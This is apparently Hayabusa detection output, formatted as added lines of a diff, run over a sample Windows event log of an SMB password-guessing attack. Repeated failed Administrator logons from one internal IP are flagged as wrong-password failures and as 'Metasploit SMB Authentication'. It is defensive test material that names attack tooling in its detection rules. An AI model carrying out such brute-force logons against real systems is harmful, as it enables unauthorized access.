+2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vi7Moaa6d12CzWhl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4fbbRVOig9bn9p5g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qSZrfRe9d0LLkbmA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QqdZMYsbXFlrKFxk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kypdxj88trEUBEny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9hM8fge1IrNsJNd2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SzG27JSj6iAFyiNT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hWcjuW8dU5ATLHzB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ns9lm9Nvhvi4fY6A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aExdYPqY2eUCYZmC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t9cnmRGdByuJlKZj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f9RvWTFFUgCrhlkD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HC3oQUIEWqztyx6s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TK3BOeD2w9xPB4N1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I6yzU5WuvpmPKLSS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GFoUGsara5Pl03WP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qLaOCImeMIMlGvMj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Vzb3pEI2ZeP2NFA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7Fa7ebH7UXd1KW4X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wRBHXRkOa6x5KI5G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VNVxzgOLrZzfP3cB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yCNXajRX2lIgLQuc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x0nukf24IoalycOn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xZFZN0KfeHtyDppG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZmxqKyWU5GU1y22P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WuRyvCfgQ4rwG3fu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3prKZt5ymouwNKnK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CWrNNn13EC1FLwLA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SfnBT5OvT5cQXHfS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RLZFPCShXoPvvThS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UsPCJ0UlfH4urYrm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MIQlOetFByLZqPkT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c9IBZ0qTDlHWADZt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lmhkB39gKvvuT89e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4KPoZ8JB7WSjUCHW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0mwiPq4gF1YXkQSl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y5ncgrpwOFo7E8vg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KbkG8ezrAPFC0iKu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GW4WKkHocNadDzrb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: unbtFAiykcfKTbQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oRzF1s9XVoRmoFQ6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9TO1c7eYd1IQHVwG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wsn5GM4BqEl6A6pY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pq350wqwVDQlTKu9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uMJWwjG7J2sOiBYd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
